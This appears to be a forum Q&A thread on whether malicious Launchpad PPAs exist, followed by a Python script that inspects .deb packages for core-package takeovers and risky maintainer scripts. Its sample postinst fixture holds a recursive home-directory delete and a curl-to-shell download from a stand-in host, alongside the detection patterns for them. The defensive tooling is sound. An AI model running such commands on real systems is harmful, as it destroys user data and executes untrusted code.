Has there been any malicious PPA so far?
People often discourage users from using PPAs because the PPA may potentially contain libraries and packages which may break the system. I have been using PPAs since 2010, and never encountered a problem (of course, I check whether a PPA hosts any suspicious packages before adding it).
Usually developers make PPAs to help others install software, not to break their systems. Also, the packages need to be digitally signed, and this way the person who packaged something fishy can be traced.
I am wondering whether "PPAs are harmful" is a common problem faced by many, or it is a popular belief which people spread (without much evidence).
I want to ask about some facts (so that the question does not become "opinion based").
- Has there been any malicious PPA so far? By malicious, I mean something which is intentionally packaged to create a dependency hell, or something that will mess with the home or / directory with the postinstall script, or something that broke the installation.
(Since the question was closed due to being opinion based, I am looking for examples of such harmful PPAs, so that it can be answered with facts).
- Is there any way a user can report a potentially harmful PPA in Launchpad?
By PPA, I am referring to a PPA hosted in Launchpad, not any third party repository hosted in any website.
This is one of the main reasons Ubuntu is turning to snap based installations: a PPA has root access to our system so when it comes to PPAs trust is high. The only safe repositories are the official ones and their mirrors.
A PPA can include packages that replace existing packages. Not really an issue if you want the newest chromium to replace and old chromium. But it is when it replaces python, or ruby, or perl or a library like libc.
Has there been any malicious PPA so far in Launchpad?
No. There is a process to get a PPA accepted on Launchpad but on Launchpad the owner of the PPA is also public so probably not a good idea to try and slip a PPA with malicious code.
Mind that malware writers probably want to earn some easy cash, and doing it through a PPA to target Linux users would require creating a new piece of software that is good enough to install. That takes weeks or even years to get done. Seems easier to target Windows users (easier to reach, and there are still many more of them).
Is there any way a user can report a potentially malicious PPA?
As with all things Launchpad related: you file a bug report against it.
If you find a malicious PPA, the preferred way to report it is via our support tracker.
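The answer's two concrete risks are packages that replace core packages (python, perl, libc) and maintainer scripts that run as root. Both can be checked before installing, without trusting the PPA: a .deb is an `ar` archive holding `control.tar.*`, whose `control` file declares Replaces/Conflicts/Breaks and whose `preinst`/`postinst`/`prerm`/`postrm` are the root-run scripts. The following is an added example, not code from the question, the answer or Ubuntu/Launchpad; the sample package, its maintainer script and the "installed packages" set are constructed inline, and the keyword heuristics (`SUSPICIOUS`) are an arbitrary starting list, not a canonical rule set.

```python
"""Inspect a .deb before installing it: which installed packages it would take
over, and what its maintainer scripts would do as root. Added example; the
sample package at the bottom is constructed for the demonstration."""
import io
import re
import tarfile

AR_MAGIC = b"!<arch>\n"
MAINTAINER_SCRIPTS = ("preinst", "postinst", "prerm", "postrm")
# Crude, hypothetical heuristics for things a package postinst has no business doing.
SUSPICIOUS = [
    (r"\brm\s+-\S*r", "recursive delete"),
    (r"/home\b|\$HOME\b", "touches user home directories"),
    (r"\b(curl|wget)\b[^|\n]*\|\s*(ba|da)?sh\b", "pipes a download into a shell"),
    (r"\bchmod\b.*\b(4[0-7]{3}|[ugoa]*\+[rwxX]*s)", "sets setuid/setgid"),
]


def parse_ar(blob: bytes) -> dict:
    """Minimal parser for the 'ar' container format that .deb files use."""
    if not blob.startswith(AR_MAGIC):
        raise ValueError("not an ar archive")
    members, pos = {}, len(AR_MAGIC)
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]            # 60-byte fixed-width member header
        if hdr[58:60] != b"`\n":
            raise ValueError("corrupt ar header at offset %d" % pos)
        name = hdr[:16].decode("ascii").rstrip().rstrip("/")  # GNU ar appends '/'
        size = int(hdr[48:58])
        members[name] = blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)       # member data is padded to an even offset
    return members


def _names(field: str) -> list:
    """Strip versions/alternatives: 'a (>= 1), b | c' -> ['a', 'b']."""
    return [re.split(r"[\s(|]", p.strip())[0] for p in field.split(",") if p.strip()]


def inspect_deb(blob: bytes, installed: set) -> dict:
    members = parse_ar(blob)
    ctrl = next(n for n in members if n.startswith("control.tar"))
    files = {}
    with tarfile.open(fileobj=io.BytesIO(members[ctrl]), mode="r:*") as tf:
        for m in tf.getmembers():
            if m.isfile():
                files[m.name.lstrip("./")] = tf.extractfile(m).read().decode("utf-8", "replace")
    fields = {}
    for line in files["control"].splitlines():   # RFC 822-style "Key: value" lines
        if line[:1] != " " and ":" in line:
            k, v = line.split(":", 1)
            fields[k.strip()] = v.strip()
    takes_over = sorted({p for f in ("Replaces", "Conflicts", "Breaks")
                         for p in _names(fields.get(f, ""))})
    scripts = {}
    for s in MAINTAINER_SCRIPTS:
        if s in files:                            # these run as root during install/remove
            scripts[s] = [why for pat, why in SUSPICIOUS if re.search(pat, files[s])]
    return {
        "package": fields.get("Package"),
        "takes_over": takes_over,
        "takes_over_installed": [p for p in takes_over if p in installed],
        "scripts": scripts,
    }


# --- constructed sample .deb (not a real package) -----------------------------
def make_ar(members) -> bytes:
    out = bytearray(AR_MAGIC)
    for name, data in members:
        out += f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(data):<10}`\n".encode()
        out += data + (b"\n" if len(data) % 2 else b"")
    return bytes(out)


def make_tar_gz(files: dict) -> bytes:
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for name, text in files.items():
            data = text.encode()
            ti = tarfile.TarInfo("./" + name)
            ti.size = len(data)
            tf.addfile(ti, io.BytesIO(data))
    return buf.getvalue()


CONTROL = """Package: evil-chromium
Version: 99.0-1ppa1
Architecture: amd64
Maintainer: Nobody <nobody@example.invalid>
Replaces: chromium-browser, libc6 (>= 2.31)
Conflicts: chromium-browser
Description: constructed sample package for the example
"""
POSTINST = """#!/bin/sh
set -e
rm -rf /home/*/.config/chromium
curl -s https://example.invalid/x.sh | sh
"""
SAMPLE_DEB = make_ar([
    ("debian-binary", b"2.0\n"),
    ("control.tar.gz", make_tar_gz({"control": CONTROL, "postinst": POSTINST})),
    ("data.tar.gz", make_tar_gz({})),
])
SAMPLE_INSTALLED = {"libc6", "python3", "perl-base"}   # constructed stand-in for dpkg's list

if __name__ == "__main__":
    print(inspect_deb(SAMPLE_DEB, SAMPLE_INSTALLED))
```

On a real system, fetch the package without installing it (`apt-get download <pkg>` after adding the PPA, or download the .deb from the PPA's Launchpad page), read it as `blob`, and build `installed` from `dpkg-query -W -f='${Package}\n'`; anything in `takes_over_installed` that is a core package, or any non-empty finding for `postinst`, is the point at which to stop and read the script by hand rather than trust the heuristics.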